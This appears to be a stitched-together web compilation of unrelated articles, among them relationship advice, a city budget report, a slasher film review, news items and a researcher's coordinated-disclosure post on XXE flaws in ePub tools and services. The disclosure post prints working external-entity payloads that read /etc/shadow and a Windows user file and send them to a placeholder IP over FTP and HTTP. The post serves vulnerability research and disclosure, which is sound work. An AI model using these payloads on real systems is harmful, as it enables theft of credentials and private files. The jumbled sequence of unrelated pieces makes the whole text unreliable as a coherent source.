Set ground rules. After a fight, you and your partner can take stock of what happened. You can discuss what hurt each of you and how you can move forward. At this point, you can set some ground rules for future arguments — like not cursing at each other or calling each other names — which might help reduce the intensity. If at any point either partner breaks one of the agreed-upon rules, or the argument gets too intense, the other partner has the right to stop, safely walk away and pick up the discussion again when things have calmed down.
Remember you're on the same team. In a healthy relationship, there should be an understanding that you're working towards a common goal: you both want to be loved and appreciated. We know that “losing” an argument can really dent your pride. Before you go too far, take a step back and think of an argument not as you against your partner, but you and your partner against a problem that you can solve together.
Arguing with someone is never easy, but it's especially difficult when you're arguing with someone that you care about. Thinking carefully and controlling yourself during an argument can help you avoid saying something that could hurt your partner or scar your relationship.
If you do not feel safe communicating with your partner, or if your partner constantly yells, calls you names, or blames you for their behavior, these can be warning signs of an unhealthy or abusive relationship. Our advocates are here to support you. Call 1-800-799-7233 anytime, or chat here on our website from 7 a.m. to 2 a.m. Central time.
With Veteran's Day coming up fast I thought some imagery from Ghosts of History might be apropos. If you're not familiar with Ghosts of History, it's a UK-based website showcasing the work of digital artists from around the world. They take images from the past and blend them with pictures from the now. There are a number of different topics – the Battle of the Bulge, the 101st Airborne in Europe during WWII, various units in France and Italy and Holland, scenes from the Eastern Front and the Pacific Theater, even imagery from WWI and Vietnam.
I'm a huge fan. Some of it is eerie, some serene…all of it is at least a little melancholy. Take a look.
Here American armor rolls through Putange, Normandy – as they looked in 1944 against how that intersection appears today.
These are US troops in France sometime after D-Day, against the same street as it is now in 2014.
US troops in Europe after D-Day.
This is the battleship Arizona, seen here on the East River in New York about to pass under the Manhattan Bridge (1916 and 2014 combined).
American infantrymen during the Battle of the Bulge – contemporary picture over the same terrain today.
Troops move through the Hague, WWII.
Canadian infantrymen in the field, in Germany, a picture from 1945 over how the ground looks today.
American MPs, Isigny sur Mer.
Fighter aircraft at Schijndel Airfield, now an industrial area.
A long US soldier in 1944 on the platform at Aachen Station with elements of how that station looks today.
You can find Ghosts of History online here: http://www.ghostsofhistory.co.uk/. They sell many of their prints, should you be inclined to support their work.
Follow them on Facebook here.
Is Adelanto the next CA city to go belly up?
July 3, 2013
By Wayne Lusvardi
The pathway into municipal budget distress is not the same for every city in California. No known city in California has attempted to cut its general fund budget nearly in half. But that's what Adelanto is trying to do by cutting its budget from $5.5 to $2.6 million.
And few cities in California have a budget document that is as honest as Adelanto's. Budgets too often rely on “gimmicks” to hide problems and shortfalls. But not in the city whose motto is, “Progress By Design.”
Located in the Mojave Desert of Southern California, Adelanto gets its name from the Spanish word for “progress” or “advance.” But despite measures to drastically cut its budget, Adelanto has regressed to a $2.5 million deficit and the city is considering declaring a “fiscal emergency.”
If taxes are not increased, this could also lead to the city declaring bankruptcy in 2014. Raising taxes could be tough on a city with only 7,300 households, nearly a third of which live near or under the poverty line. Raising the existing utility tax by $2.5 million per year, as the city proposes, would reflect a $342 per year tax increase per household.
The median household income in Adelanto is $42,208 per year. This is $19,424 less than the statewide median income of $61,632 per household. About 28 percent of residents of Adelanto live below the poverty level, compared to about 14 percent for the statewide average.
City government living off sewer fund
The biggest budget problem is not a decline in tax revenues as much as it is an inability to sustain the level of funding for an incorporated city in the first place. The largest current tax generator to the city's general fund is a $2.2 million annual transfer from the Public Utility Fund of utility bill revenues for a proposed sewer treatment facility. Adelanto's city government is dependent on a sewer project to patch its budget. What happens when this project is finished?
In recent years, the city has balanced its budget only by using $5.1 million in the remaining proceeds from the $28 million sale of the city-owned and operated Adelanto Community Correctional Facility in 2010. Adelanto had gotten into the corrections business to supplement its low private economic base. But now the state has vastly reduced or taken away redevelopment funds and diverted property taxes back to schools. This forced Adelanto to sell its correctional facility as a stopgap measure to plug the hole in its municipal budget.
Affordable housing an artificial jobs program
When the state took away redevelopment from cities in 2010, however, it allowed them to retain their affordable housing funds. Under California's former redevelopment law, 20 percent of the property tax increase created by commercial redevelopment was designated for affordable housing. But creating government jobs producing affordable housing in Adelanto would at best be an artificial jobs program.
Zillow.com reports the median home sales price in Adelanto is $116,000. Assuming a 30-year fixed mortgage, 20 percent down payment and 5 percent interest rate, the typical monthly housing payment in Adelanto would be $498 per month.
The U.S. Department of Housing and Urban Development's affordable housing formula calls for no more than 30 percent of gross household income to go toward housing. In Adelanto, HUD's affordable housing formula would equate to about $1,055 per month maximum mortgage payment. Houses typically rent from $750 to $1,250 per month in Adelanto, according to Zillow.com.
So the private marketplace is already producing re-sale and rental housing at a much lower price than even HUD standards. Nonetheless, the State of California Department of Housing and Community Development has mandated that Adelanto must rezone 40 acres of vacant desert land for multi-family housing. This would only add to the burden of public services that Adelanto must provide without adding any economic base to support it.
Adelanto history is depleted water basins and budgets
Ironically, the history of Adelanto has not been reflected by progress, but by the depletion of natural and financial resources. The city was once known for its apple tree orchards grown in the middle of the desert until in the 1950's, when the local groundwater basin became overdrafted. By 1990, the nearby City of Barstow had to sue Adelanto and other users to get a court to oversee management of the Mojave Groundwater Basin.
Adelanto's history is a story of depleted water basins and longstanding depleted municipal budgets. The Mortgage Bubble and Redevelopment Bubble covered up Adelanto's chronic municipal budget deficit issue for decades.
California's Solar Initiative database indicates only 21 installations of rooftop solar systems in Adelanto since 2007, hardly enough to help impact a distressed community with jobs or decreased electricity bills.
Adelanto is not the only high desert city in San Bernardino County is budget distress. Adelanto has joined Apple Valley, Hesperia and Victorville in exploring the feasibility of forming a regional police and fire agency, instead of contracting with San Bernardino County for such services.
The biggest economic generator in Adelanto has been government, not industry or commerce. Ironically, if the city merely dis-incorporated, letting the county take over all services, its budget problems might disappear altogether. But this is not going to happen when municipal employment is a source of six-figure jobs for a few people in a community without much economic mobility. The prospect of a government or school district job for a few in such struggling communities is often more symbolically powerful than reducing the burden of government for everyone.
But history has shown that more government hasn't provided a pathway out of Adelanto's budget problems. Less government by dis-incorporation is a potential option, but not a politically viable one.
I was pensive about the notion of family yesterday, reminded of my own childhood by the above photo. As a result of this, I wanted to put together this little thought piece on family, equality and what the notion of a familial bond means in two very different cultures.
Average childs perspective – Family in the South of England in 2016:
F is for fighting over who is logged into the shared Netflix account and what is watched on the 32″ TV.
A is for ‘Aaah!', the sound we make when the NHS doctor asks us to open our mouth. The waiting list is long, but at least I get my teeth seen.
M is for ‘Mmmm', the sound we all make when we have our weekly takeaway treat. We aren't rich, but a treat every now and again is ok.
I am for ill, something I like to pretend I am every now and again to get a day off school.
L is for Literacy, I find it boring in school but at least I know how to read and write.
Y is for years, many many years that I think I will live.
Average childs perspective – Family in the East of Congo in 2016:
F is for food. We don't have much and my mum is not well because she makes sure that I eat enough. This makes me feel guilty, I don't want mum to die.
A is for anaemia. Having anaemia is normal, half my friends have it.
M is for military, it's hard to tell who are the goodies when you don't really understand who is fighting for what; I can tell you they are really scary though. Living in the east of Congo is hard, but we can't afford to relocate.
I am for ill, something that I regularly am and stops me from going to school.
L is for looting, we did try and move west once but it didn't work out and when we got home our whole house had been looted. I think it was probably soldiers who did it, I'm not sure who's side they were on or what they were fighting for.
Y is for years, I don't think it's likely I'll liver than many years. But I will try and live them happy.
(Photo – Eli Woodbine, Canada, 2016)
Advertisements
The Toronto Maple Leafs could have another big deal in store before Monday's 3 p.m. ET trade deadline.
According to Sportsnet's Nick Kypreos, the Maple Leafs are trying “real hard” to move captain Dion Phaneuf.
“It's abundantly clear that he won't be the captain next year,” Kypreos said Sunday on Sportsnet 590 The Fan. “So the sooner they can get him out, the better. They're trying real hard to make that deal going into (Monday).
“It's a gut feel, but I think (by) this time (Monday), Phaneuf is a member of another hockey club.”
Kypreos added Phaneuf appeals to a handful of teams in need of an upgrade on the back end, but the Leafs will have to retain part of his salary in order to make any trade work.
“It's a matter of that contract,” Kypreos explained. “As soon as there's a number that can be agreed upon, he will not be a member of the Toronto Maple Leafs.”
Phaneuf signed a seven-year, $49 million contract extension during the 2013-14 season. He will become an unrestricted free agent after the 2020-21 season.
The Leafs are in the midst of a long-term rebuild. They have already traded roster players such as David Clarkson, Cody Franson, Mike Santorelli, and Daniel Winnik and are expected to be active before Monday's 3 p.m. trade deadline.
The Globe and Mail reported last month that core players such as Phaneuf and forward Phil Kessel are not part of the organization's blueprint moving forward.
“Mr. Phaneuf and Mr. Kessel are not in the plan,” Cathal Kelly wrote on Feb. 12. “The goal now is extracting as much value as possible for them. That translates either to young players who are high-ceiling projects and draft picks.
The 29-year-old defenceman has registered three goals, 20 assists, 89 penalty minutes with a minus-6 rating this season.
He has only appeared in seven playoff games since Toronto acquired him in a trade with the Calgary Flames on January 31, 2010.
Children raised in poverty suffer many ill effects: They often have health problems and tend to struggle in school, which can create a cycle of poverty across generations.
Now, research is providing what could be crucial clues to explain how childhood poverty translates into dimmer chances of success: Chronic stress from growing up poor appears to have a direct impact on the brain, leaving children with impairment in at least one key area -- working memory.
"There's been lots of evidence that low-income families are under tremendous amounts of stress, and we know that stress has many implications," said Gary W. Evans, a professor of human ecology at Cornell University in Ithaca, N.Y., who led the research. "What this data raises is the possibility that it's also related to cognitive development."
With the economic crisis threatening to plunge more children into poverty, other researchers said the work offers insight into how poverty affects long-term achievement and underscores the potential ramifications of chronic stress early in life.
"This is a significant advance," said Bruce S. McEwen, who heads the laboratory of neuroendocrinology at Rockefeller University in New York. "It's part of a growing pattern of understanding how early life experiences can have an influence on the brain and the body."
Previous research into the possible causes of the achievement gap between poor and well-off children has focused on genetic factors that influence intelligence, on environmental exposure to toxins such as lead, and on the idea that disadvantaged children tend to grow up with less intellectual stimulation.
"People have hypothesized both genetic and environmental factors play a role in why poor children don't do as well in school," said Martha Farah, director of the center for cognitive neuroscience at the University of Pennsylvania. "Experiential factors can include things like having fewer trips to museums, having fewer toys, having parents who don't have as much time or energy to engage with them intellectually -- to read to them or talk to them."
But Evans, who has been gathering detailed data about 195 children from households above and below the poverty line for 14 years, decided to examine whether chronic stress might also be playing a role.
"We know low-socioeconomic-status families are under a lot of stress -- all kinds of stress. When you are poor, when it rains it pours. You may have housing problems. You may have more conflict in the family. There's a lot more pressure in paying the bills. You'll probably end up moving more often. There are a lot more demands on low-income families. We know that produces stress in families, including on the children," Evans said.
For the new study, Evans and a colleague rated the level of stress each child experienced using a scale known as "allostatic load." The score was based on the results of tests the children were given when they were ages 9 and 13 to measure their levels of the stress hormones cortisol, epinephrine and norepinephrine, as well as their blood pressure and body mass index.
"These are all physiological indicators of stress," said Evans, whose findings were published online last week by the Proceedings of the National Academy of Sciences. "The basic idea is this allows you to look at dysregulation resulting from stress across multiple physiological systems."
The subjects also underwent tests at age 17 to measure their working memory, which is the ability to remember information in the short term. Working memory is crucial for everyday activities as well as for forming long-term memories.
We're incredibly excited to partner with Fandor, a streaming service with the biggest handpicked collection of the most-talked-about indie films from around the world. With a catalogue this diverse and provocative, it was both easy and very, very hard to choose a handful of titles to discuss here on BMD.
When you think about the films that inspire their own sort of mini sub-genre, they tend to seem quaint in comparison to what followed, as the successors went with a "bigger = better" mentality until the point of ridiculousness. That's why if you go back and watch Saw you realize it's not really that violent or gory, and (stepping outside of horror) why Die Hard's mere 12 terrorists in a building is nothing compared to say, a battleship crawling with bad guys like Under Siege, or the entire city of New York (and even more bad guys) in one of Die Hard's own sequels. But there is one exception: Mario Bava's A Bay of Blood*, which is rightfully credited as an inspiration to the slasher genre and yet is more complicated than the entire Scream series put together.
The opening sequence probably plays better now than it did back then, as we've had decades of structurally similar slasher movies to put our expectations in place. When the film begins, a lone woman is cautiously making her way around her house during a storm when she is suddenly killed by a black-gloved stranger. This is nothing new on its own - the black-gloved man or woman is our mystery killer and we will find out who he/she is during the final reel...except Bava pans his camera up and shows the man's face, plain as day. Of course, this is the first scene in the movie and thus his identity means nothing to us, but it doesn't matter - because someone kills him a few minutes later! And he won't be the last killer to star in his own death sequence - when all is said and done, there are five different murderers in the film (for a total of 13 deaths), which is more than the intentionally ridiculous number in the movie Clue ("Then who did I kill?").
That said, the film is not that difficult to follow, as Bava tosses in a few (slightly clunky) flashbacks to smooth over a few plot points during the third act, and when all is said and done you know who killed who - it's just funny that the "granddaddy of the slasher movie" requires you to pay any real attention to follow along. You can skip a half hour of your average '80s slasher and have no problem keeping up with the narrative, but here you might be thrown for a loop when the guy you saw kill someone is suddenly in the victim role. And this is of particular interest when you watch it for the first time post-Friday the 13th (and its first sequel) and see how much Sean Cunningham and Steve Miner ripped off "paid homage" to the film. I love these movies dearly, but I'll be the first to admit that their narratives are flimsy even by slasher standards, making it amusing that they were inspired by one that might require a notebook to keep track of who's who. Even Pamela's sweater is similar to the one worn by the film's primary killer Simon, and the POV shots Cunningham employed, sometimes wrongly attributed to Carpenter's influence, are clearly taken from this film. Miner went even further for F13's first sequel; not only is the lakeside cabin setting very similar to the one in this movie, but he flat-out steals the famous double impaling murder of a couple making love:
And the reason everyone is killing each other is over a piece of real estate, and you might be surprised how many times that concept has been recycled (when I was doing Horror Movie A Day, I would often half-jokingly consider tagging such films the same way I did if they were Asian or Monster or Slasher movies: "Real estate horror"). But again, these films are usually more straightforward (the terrific Hong Kong slasher Dream Home, for example), as few seem to think Bava's idea of having multiple murderers was a good idea. Sure, we've had films like Scream where there were two killers, but they were working together - here the killers tend to be done in by other killers. Using Scream as an example, it'd be like if Stu killed Billy (who would have had little knowledge of Stu's own agendas), Sid killed Stu and then someone killed Sid for good measure.
But despite their different motives and lack of team orientation, the killers here all share a passion for creative murdering. You'd think that a real estate extortion scheme could be carried out with a few guns, but the film's lone gunshot murder is... well, I'll leave that surprise for those who haven't seen it yet. Everything else, despite the fact that a number of the kills are merely to silence a witness (or a potential one), offers a sense of showmanship, with a variety of weapons to boot - a fisherman's spear, a billhook, an axe, strangulation... even Jason would be impressed with the number of implements that are used over the film's 84 minutes. Most of them are sufficiently gory as well, something that was probably unexpected (apparently Christopher Lee walked out of the film, disgusted with its otherwise unseen level of violence). While gore wasn't new (Herschell Gordon Lewis had been at it for almost a decade at that point), Bava's previous films were decidedly classier than anything ol' HGL was up to, so I doubt Lee or anyone else expected to see something like THIS in a film from the director of Black Sabbath:
See, unlike many of his fellow Italian horror kings (Argento, Fulci, etc), Bava wasn't really known for indulging in the splatter. Even his previous film Hatchet for the Honeymoon, which also involved multiple murders, avoided gore for the most part - he would cut away to flashbacks when the killer struck. But here he seems to be making up for lost time, even inventing a classic slasher staple - the random teens who just want to drink and have sex. You could easily cut this foursome out of the film with minimal effort, as they have nothing to do with the real estate plot, but it's precisely this sort of thing that makes it an essential part of the slasher lore. It's their needlessness that inspired so many other slashers down the road, as Jason and Michael and all their less successful peers would always kill at least one person for no real reason other than the fact that it had been a while since the last kill (think the random hitchhiker in Final Chapter, or the neighbor girl in Halloween II).
These deaths (which include the ones that are pictured above) are the bloodiest in the movie, and it's the mild excess in these moments that was probably most to blame for the film being censored for certain territories, with anywhere from 45 seconds to around 8 minutes (!) excised for one reason or another. Carlo Rambaldi was still a few years away from moving out of this sort of thing with bigger budgeted fare like King Kong '76 (and later, E.T.), but no novice either - his kill FX are terrific and mostly hold up even under the scrutiny of HD transfers. Speaking of which, there are some really bad versions floating around - my first viewing was on a disc so bad that it left me unable to enjoy the film. There's a pretty good one on Anchor Bay's (now out of print) Bava box, and the version on Fandor is pristine... everything else I can't vouch for, so proceed with caution. After seeing it on a proper presentation it quickly became one of my favorite Bava films - it's amazing what audible dialogue and a complete image can do for your opinion.
The history of the slasher film is one I find very fascinating, and a big part of that is how slowly it evolved. 1960 gave us both Psycho and Peeping Tom, both instrumental in the sub-genre's history without actually BEING slashers by the common definition, and then it took 20 years from them to get to Friday the 13th, the success of which (thanks in part to its major studio distribution, unlike Halloween's independent release) cemented the sub-genre once and for all and inspired the biggest wave it will ever see. A Bay of Blood is almost exactly in the middle of that time period, detouring from the traditional giallo structure into new-ish territory, and inadvertently laying the foundation for one of horror's most prolific sub-genres. An absolutely essential film to watch for anyone who has ever tried to sound smart by mentioning how much Halloween owes to Black Christmas - you can fire right back by name-checking this.
* aka Twitch of the Death Nerve, Last House on the Left II and probably every other possible combination of 4-5 words in the English language. And about as many Italian titles.
Fandor makes it easy for you to find the right film to watch. With the biggest handpicked collection of the most-talked-about indie films from around the world, there's always something great to watch, whatever your mood, on almost any device.
“We use the ePub format - it is the most popular open book format in the world. We're very excited about this.” - Steve Jobs, 2010 (original iPad launch)
TLDR; Applying a familiar XXE pattern to exploit services & readers that consume the ePUB format. Exploiting vulnerabilities in EpubCheck <= 4.0.1 (ePub Validation Java Library & tool), Adobe Digital Editions <= 4.5.2 (book reader), Amazon KDP (Kindle Publishing Online Service), Apple Transporter, and Google Play Book uploads, etc.
ePub is a standard format for open books maintained by IDPF (International Digital Publishing Forum). IDPF is a trade and standards association for the digital publishing industry, set up to establish a standard for ebook publishing. Their membership list: http://idpf.org/membership/members
An epub is based on XML, CSS, XHTML, etc web content zipped together into a single package, which ends in the extension .epub. Depending on the reader device/application support, ePub can also support interactivity using Flash and Javascript.
ePub uses XML metadata to define the document structure, support digital signatures, digital rights (DRM) etc.
eg., epub archive:
Archive : book . epub Length Date Time Name --------- ---------- ----- ---- 20 04 - 09 - 2014 15 : 41 mimetype 2189 04 - 09 - 2014 15 : 41 toc . ncx 39962 04 - 09 - 2014 15 : 41 OEBPS / chapter - 001 - chapter - i . html 41745 04 - 09 - 2014 15 : 41 OEBPS / chapter - 002 - chapter - ii . html 684 04 - 09 - 2014 15 : 41 OEBPS / title - page . html 557 04 - 09 - 2014 15 : 41 OEBPS / front - cover . html 42220 04 - 09 - 2014 15 : 41 OEBPS / chapter - 003 - chapter - iii . html 1185 04 - 09 - 2014 15 : 41 OEBPS / copyright . html 884 04 - 09 - 2014 15 : 41 OEBPS / table - of - contents . html 234790 04 - 09 - 2014 15 : 41 OEBPS / assets / pressbooks - promo . png 33684 04 - 09 - 2014 15 : 41 OEBPS / assets / MedulaOne - Regular . ttf 244146 04 - 09 - 2014 15 : 41 OEBPS / assets / themetamorphosis_1200x1600 . jpg 661 04 - 09 - 2014 15 : 41 OEBPS / pressbooks - promo . html 27328 04 - 09 - 2014 15 : 41 OEBPS / jackson . css 3494 04 - 09 - 2014 15 : 41 books . opf 240 04 - 09 - 2014 15 : 41 META - INF / container . xml 157 04 - 09 - 2014 15 : 41 META - INF / com . apple . ibooks . display - options . xml --------- ------- 673946 17 files
eg., contents of META-INF/container.xml
<?xml version="1.0"?> <container version= "1.0" xmlns= "urn:oasis:names:tc:opendocument:xmlns:container" > <rootfiles> <rootfile full-path= "OEBPS/book.opf" media-type= "application/oebps-package+xml" /> </rootfiles> </container>
eg., contents of book.opf
<?xml version="1.0" encoding="UTF-8" ?> <package version= "2.0" xmlns= "http://www.idpf.org/2007/opf" unique-identifier= "PrimaryID" > <metadata xmlns:dc= "http://purl.org/dc/elements/1.1/" xmlns:opf= "http://www.idpf.org/2007/opf" > <dc:title> My Book </dc:title> <dc:language> en </dc:language> <dc:identifier id= "PrimaryID" opf:scheme= "URI" > http://mybook.com </dc:identifier> <dc:description> Description </dc:description> <dc:creator opf:role= "aut" > Author </dc:creator> <dc:publisher> Publisher.com </dc:publisher> <meta name= "cover" content= "cover-image" /> </metadata>
When I first started looking into this, I learned about a tool/Java library called EpubCheck (provided by IDPF) that is used to validate books in the ePub format. Book publishers tend to perform a validation step using something like this to check the format validity. The validator tool/library was vulnerable to XXE, so any application that relies on a vulnerable version to check the validity of a book would be susceptible to this type of attack.
Modifying an existing ePub file to test for XML parsing vulnerabilities:
curl https://s3-us-west-2.amazonaws.com/pressbooks-samplefiles/MetamorphosisJacksonTheme/Metamorphosis-jackson.epub -o book.epub
unzip book.epub; rm book.epub
Edit any of the files that contain XML metadata.
eg., book.opf (XXE - XML External Entities pattern)
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE a [<!ENTITY % b SYSTEM "http://123.123.123.123/dtd"> %b;%c;]> <package version= "2.0" xmlns= "http://www.idpf.org/2007/opf" unique-identifier= "PrimaryID" > <metadata xmlns:dc= "http://purl.org/dc/elements/1.1/" xmlns:opf= "http://www.idpf.org/2007/opf" > <dc:title> Metamorphosis </dc:title> <dc:language> en </dc:language> <dc:identifier id= "PrimaryID" opf:scheme= "URI" > http://metamorphosiskafka.pressbooks.com </dc:identifier> <dc:description> &send; </dc:description>
zip -r book.epub *
Point at a HTTP server to serve the following contents, and specifying a FTP server to recieve the specified file
<!ENTITY % d SYSTEM "file:///etc/shadow"> <!ENTITY % c "<!ENTITY send SYSTEM 'ftp://123.123.123.123/%d;'> ">
EpubCheck <= 4.0.1
There was a online instance of EpubCheck, that would accept user uploads and perform validation on the format. This provides an example of how this vulnerability could be used to attack online services that support ePub in some way, if they are using a vulnerable version of EpubCheck to validate the uploaded file.
Uploading our created file:
HTTP listener receiving the dtd request when parsed by the remote XML parser, and custom FTP listener receiving the file (I didn't think it would work, but specified /etc/shadow as the file to retrieve).
This means that we accidentally retrieved the /etc/shadow file. Public facing web apps running as root/system in prod… 😫
A few examples of other services, and applications I came across that were vulnerable:
Amazon KDP which allows publishers to upload books, was susceptible to XXE when converting books to the Kindle format.
Adobe Digital Editions <= 4.5.2 (book reader) when a user opens a book, this would allow files to be taken from their system. CVE-2016-7889.
External DTD specifying the file to retrive:
<!ENTITY % d SYSTEM "file:///c:/Users/Documents/secret.txt"> <!ENTITY % c "<!ENTITY send SYSTEM 'http://123.123.123.123/exfil/%d;'> ">
eg., Retrieving secret stuff from a users Windows documents folder:
Apple Transporter (underlying tool used to validate metadata and assets and deliver them to the iTunes Store), CVE-2016-7666.
Google Play Book uploads did not allow external entity processing, but was vulnerable to XML exponential entity expansion a billion laughs. When uploading a ePub with this pattern, it would spend about 45 minutes trying to process the file before returning an error condition. Google confirmed this on their side.
There are more things going on with the ePub format beyond the familiar patterns shown here. Some applications will allow Flash to be run, and Javascript execution in the context of the book reader, so you can imagine this can be used to perform some attacks; currently waiting on vendor fixes before talking about this.
Disclosure timeline stuff:
Sep 2016: Reported XXE in EpubCheck <= 4.0.1.
Sep 2016: Reported XXE in Adobe Digital Editions <= 4.5.2.
Sep 2016: Reported XXE in Amazon KDP.
Oct 2016: Reported XXE in Apple Transporter
Oct 2016: Reported XML exponential entity expansion in play.google.com book uploads.
Dec 2016: Coordinated disclosure.
Jan 2017: This blog post (lots of time for users to patch).
Thanks to CERT/CC for their help in coordinating with different vendors & IDPF, and setting a disclosure timeline. I only tested a handful of digital readers and services, so if you find other vulnerable readers/services, tell CERT/CC (they were tracking the ePubCheck issue as VU#779243).
If you got this far, thanks for reading. 👋
@craig
The Cannes Film Festival starts this week, which means it's time for a slew of out-of-context film clips to begin filtering out into the web. Like this clip from Michael Haneke's Happy End, for instance, featuring Isabelle Huppert, Jean-Louis Trintignant, Mathieu Kassovitz, Fantine Harduin, Franz Rogowski and Laura Verlinden engaged in a not-so-light dinner conversation.
Happy End is Haneke's follow-up to his 2012 Amour, which also featured Huppert and Trintignant. While only an element of the plot and not the main focus, the film will touch on the migrant crisis in Europe. “The film is a portrait of a very wealthy family running this big company in Calais, not far from the camp where the migrants are. And it says a lot about how in our lives, in our privileged world, we are too often deaf and blind to the harsh reality of the world — about the privileged world,” Huppert, who previously worked with Haneke on The Piano Teacher and Time of the Wolf, told THR. “We all know about the negative power of images, of those circulating on the Internet, about how images can be used to say very horrible things but I think fiction, films like these also have a role to play, if we are to understand what is happening, and understand ourselves.”
Keeping Haneke's other filmography in mind, odds are good the title Happy Ending isn't to be taken literally. Happy End will premiere at Cannes on May 22. No U.S. release date has been announced yet, but Sony Pictures Classic has acquired North American rights. Check out the clip below, and we'll add a subtitled version when available.
Update: See the first three clips with English subtitles.
The 2017 Cannes Film Festival runs from May 17 – 28. See the first poster above (via THR).
Image copyright AP Image caption Tickets for the Detroit show sold out in minutes
Actor Charlie Sheen was booed off stage by fans on the first night of his Violent Torpedo Of Truth: Defeat Is Not An Option one-man show in Detroit.
The former Two And A Half Men star had initially been greeted with rapturous applause, but fans reportedly began to walk out within 15 minutes.
Sheen had promised to tell "the real story", but critics said he instead gave "a series of nonsensical rants".
The show ended after an hour when Sheen failed to return after a musical break.
Entertainment Weekly described the show as an "unmitigated disaster".
"The padded and disjointed show was a hodgepodge of video clips and Sheen-isms that felt hastily assembled and misjudged the patience of even the hardest of hardcore fans," it said.
The Hollywood Reporter said: "Call it 'tiger blood' or 'Adonis DNA' if you will. Just don't call it entertainment."
Sheen opened with a monologue saying: "I am finally here to identify and train the Vatican assassin locked inside each and every one of you."
Image copyright AFP Image caption Unhappy fans walked out of Sheen's show early
After talking about his "napalm dripping brain" and describing himself as "a giant and leaky bag of mayhem", he added: "Is anybody else as confused by this as I am?"
He also showed film clips including one he wrote, produced and directed entitled RPG, but was abruptly halted after more booing from the audience.
The 45-year-old responded to one heckle by saying: "I already got your money, dude."
He later told the crowd the show was "an experiment" adding: "You paid your hard-earned money without knowing what this show was about."
Fans walked out chanting "Refund!" and were quick to express their disappointment outside.
"I was hoping for something. I didn't think it would be this bad," said Linda Fugate from Detroit, who said she paid $150 (£93) for two tickets.
"I expected him to at least entertain a little bit. It was just a bunch of ranting," said Rodney Gagnon, who travelled from Ontario in Canada for the show.
Others blamed the audience: "I thought it was good. It was what I expected," Lori Caputo of Battle Creek, Michigan, told USA Today.
"I was disappointed in everybody booing."
The Detroit performance was the first of 22 sold-out planned shows in 20 US and Canadian cities.
Sheen's publicist Larry Solters declined to comment after the show.
Sheen was fired from hit comedy Two and A Half Men last month amid a frenzy of US media reports on his controversial personal life.
Meanwhile, Martin Sheen has spoken to the BBC about the "roller coaster ride" his family have experienced in trying to support his son.
"Charlie is dealing with the most profound problems and addiction - there's no secret, his behaviour has been an example of that," he told Kirsty Young on Radio 4's Desert Island Discs.
BERLIN (Reuters) - U.S. President Barack Obama told Germans and their leader on Saturday he would not let intelligence work damage relations, and differences of opinion between the two countries was no reason to wiretap.
U.S. President Barack Obama speaks about the National Security Agency from the Justice Department in Washington January 17, 2014. REUTERS/Kevin Lamarque
In a rare interview on German TV, Obama set out to mend ties frayed last year by media reports citing leaked intelligence documents that Washington was spying on European Union citizens and had bugged Chancellor Angela Merkel's mobile phone.
“I must and cannot damage this relationship through surveillance measures that obstruct our trusting communication,” Obama told ZDF public TV, according to a German translation of his comments.
“As long as I am the President of the United States, the German Chancellor need not worry about that,” he added.
The interview came a day after Obama banned U.S. eavesdropping on the leaders of close allies, among a series of reforms triggered by the revelations of former U.S. security contractor Edward Snowden.
Obama's comments on Saturday were his clearest indication that Germany was included in that list of allies.
Merkel and he “may not always be of the same opinion on issues of foreign policy, but that is no reason to wiretap,” he told ZDF.
The German leader accused the United States of an unacceptable breach of trust after the allegations about her mobile in October and phoned Obama to tell him any bugging was unacceptable. Berlin has since been pushing for a sweeping “no-spy” agreement with Washington.
Obama stopped short of apologizing over the allegations on Saturday and defended the importance of U.S. intelligence work for international security.
The capabilities of the U.S. services went “beyond the abilities of many other states,” he said, and that meant a “special responsibility for the United States”.
“Why would we need intelligence services if they only found out things you can read in Spiegel (magazine) or the New York Times,” he asked.
“Per definition, those services are tasked with finding out what people are planning, what goes on in their minds, what their aims are. That supports our diplomatic and political goals.”
Even as the White House put the final touches on its security reform plan this week, media outlets reported that the National Security Agency gathers nearly 200 million text messages a day from around the world and has put software in almost 100,000 computers allowing it to spy on those devices.
Snowden, living in asylum in Russia, is wanted on espionage charges, although some Americans would like him to be granted amnesty for exposing secrets they feel needed to be made public.
It's a pretty safe bet to assume that if you're buying a Windows phone, you're buying it because you're a fan of Windows phone in general. It follows on from there that if you're a Windows phone fan, you'll want to be on the latest updates, get access to insider builds or barring that, quick access to the latest updates as they come out.
In Windows Phone 8 and 8.1 (for a while at least), Windows phone users who bought the third party Windows phones were out of luck. While such phones often offered features which comparably priced Lumia didn't offer, they were often slow on updates, with a number of them being ineligible to update to Windows 10 Mobile for some contrived reason or the other. Even flagships like the HTC One M8 for Windows or Samsung Ativ SE were left behind. Now, with Windows 10 Mobile, Microsoft's Windows As a Service practice meant that all Windows 10 devices could expect to receive updates at roughly the same time. While big updates could be held back for a week or two, the updates would eventually roll out to all phones in the end. That was the assumption at least.
Unfortunately, it seems that Microsoft can still allow OEMs to leave their Windows phones completely unsupported. Take the Coship Moly X1 for instance, launched with Windows 10 Mobile and sold in the USA and Europe, the phone offered a cheap big screen experience for Windows phone fans who didn't want to shell out for flagship devices. That phone is completely unsupported. As of today it still runs Windows 10 Mobile version 1511 (for reference Microsoft released version 1607 two months ago and has just announced Version 1703). It has no access to insider builds and is completely cut off from newer app updates targeting the build –most notably Skype. There are probably other Windows phones sold which are abandoned by their manufacturer despite the Windows As a Service program, which is a shame.
I'm not saying you should completely ignore third party Windows phones because that's all we have right now, but exercise discretion much like you would an Android phone. Alcatel's Idol 4S and HP's Elite x3 are probably safe bets, both manufacturers promise quick updates for their Windows 10 phones, and the former works on the insider program. Windows 10 is moving too fast to be left two major versions behind.
The 49-year-old politician, who is a member of the Parliament of Catalunya, served two terms at Camp Nou before standing down in the summer of 2010
Who do you think should be Goal.com International's World Player of the Week this week? Leave your nomination in the comments section of THIS article between 10.00 every Sunday and 11.00CET every Monday. We will include some of the best suggestions in our winners piece.
Former Barcelona president Joan Laporta has revealed that he is considering running for re-election.The Catalan politician occupied the top job at Camp Nou for a total of seven years before stepping down after his second term in 2010 and was succeeded at the helm by Sandro Rosell.However, Laporta has explained that he is not happy with how the club is currently being run and is therefore open to a return."I'm ready to go back to being president of FC Barcelona," he told EFE. "It's a thought that occurred to me at the end of the season, after analysing how everything was going and I had a clear perception that the current board is obsessed with destroying what we did."And I'm very proud of the model Barça built. So when I'm asked if I will return, I answer: 'Yes, I'm thinking about it.'"Barcelona won four Liga titles, two Champions Leagues, one Copa del Rey and a Club World Cup during Laporta's tenure.
Sign Up For The FloCombat Newsletter
Simon Dawson/Bloomberg News
